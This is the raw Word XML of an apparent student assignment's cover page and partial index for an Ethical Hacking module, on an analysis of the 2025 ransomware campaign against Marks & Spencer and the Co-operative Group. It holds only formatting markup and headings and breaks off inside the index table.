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04E7609" w14:textId="77777777" w:rsidR="00AB6328" w:rsidRPr="00C668B5" w:rsidRDefault="00AB6328" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613D23CE" w14:textId="77777777" w:rsidR="00981BC9" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1229FAC3" w14:textId="77777777" w:rsidR="00981BC9" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795BC12A" w14:textId="77777777" w:rsidR="00981BC9" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A235132" w14:textId="77777777" w:rsidR="00981BC9" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C53D592" w14:textId="75253E1B" w:rsidR="00AB6328" w:rsidRPr="00C668B5" w:rsidRDefault="00AB6328" w:rsidP="00AB6328">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A0539E9" wp14:editId="7BC3BB45">
            <wp:extent cx="4166483" cy="1443877"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="12518523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7" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="20061" b="27974"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4180760" cy="1448825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5577A2" w14:textId="77777777" w:rsidR="00AB6328" w:rsidRPr="00C668B5" w:rsidRDefault="00AB6328" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2F1A3C" w14:textId="77777777" w:rsidR="00AB6328" w:rsidRPr="009F4FC9" w:rsidRDefault="00AB6328" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Raj Bhatia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E3A21" w14:textId="77777777" w:rsidR="00AB6328" w:rsidRPr="00C668B5" w:rsidRDefault="00AB6328" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Student Number: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2522682</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915962D" w14:textId="77777777" w:rsidR="00AB6328" w:rsidRPr="00C668B5" w:rsidRDefault="00AB6328" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6668C013" w14:textId="7DC1A994" w:rsidR="00667584" w:rsidRDefault="00667584" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">DEPARTMENT OF CYBER SECURITY &amp; Digital </w:t>
      </w:r>
      <w:r w:rsidR="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>orensic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE4358B" w14:textId="52F84A21" w:rsidR="009F4FC9" w:rsidRPr="009F4FC9" w:rsidRDefault="009F4FC9" w:rsidP="009F4FC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>University of Wales Trinity Saint David</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274DD869" w14:textId="0F536CBF" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Module: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethical </w:t>
      </w:r>
      <w:r w:rsidR="00BA6ED1" w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>acking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531169C1" w14:textId="77777777" w:rsidR="003B4D01" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Module Code: </w:t>
      </w:r>
      <w:r w:rsidR="003B4D01" w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ACCA7033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D27A552" w14:textId="499E2580" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Academic Year: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2026-2027</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28231EFE" w14:textId="54724DF8" w:rsidR="00667584" w:rsidRPr="00C668B5" w:rsidRDefault="00667584" w:rsidP="00981BC9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Submission Date: </w:t>
      </w:r>
      <w:r w:rsidR="00BA6ED1" w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00BA6ED1" w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00BA6ED1" w:rsidRPr="009F4FC9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> May 2026</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="418385D5" w14:textId="4AFA9061" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="00EB5A9D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Index</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>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9"/>
        <w:gridCol w:w="7655"/>
        <w:gridCol w:w="986"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="5C8EEF48" w14:textId="77777777" w:rsidTr="00304D0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709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BDA58D0" w14:textId="59CEA4CA" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="00304D0A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Sr No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="028E2DCF" w14:textId="77777777" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50014A5F" w14:textId="2557E27F" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="00304D0A">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Page No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="51D53B56" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1BCE3BB4" w14:textId="4A52B7BB" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="00304D0A">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Task 1 - A Critical Analysis of the 2025 Ransomware Campaign Against Marks &amp; Spencer and The Co-operative Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="482A97DD" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C522F00" w14:textId="2F479A10" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77E20E41" w14:textId="68EE2549" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3649CC2C" w14:textId="12F2D35F" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="0E32B869" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2510D7FF" w14:textId="46C48A75" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="123B1BE5" w14:textId="3B4EC729" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00A9D3E5" w14:textId="08A398A4" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="73AD352F" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD93ACF" w14:textId="18B98BF2" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB1F20E" w14:textId="7E44CE39" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Incident Summary and Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679FAC98" w14:textId="072376BE" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="1F08F5C3" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DE307A" w14:textId="5A7AF065" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24F6A172" w14:textId="0C867323" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Adversary TTP Mapping (MITRE ATT&amp;CK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249C6630" w14:textId="763C06B7" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="00FB5A2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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="4E7EBDE8" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35C907C4" w14:textId="7D1904A8" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C3BC071" w14:textId="78186617" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Root Cause and Security Control Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B52B1E1" w14:textId="2794E085" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="601363A4" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D14E937" w14:textId="3262A00A" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76439ED8" w14:textId="0CA27DE5" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
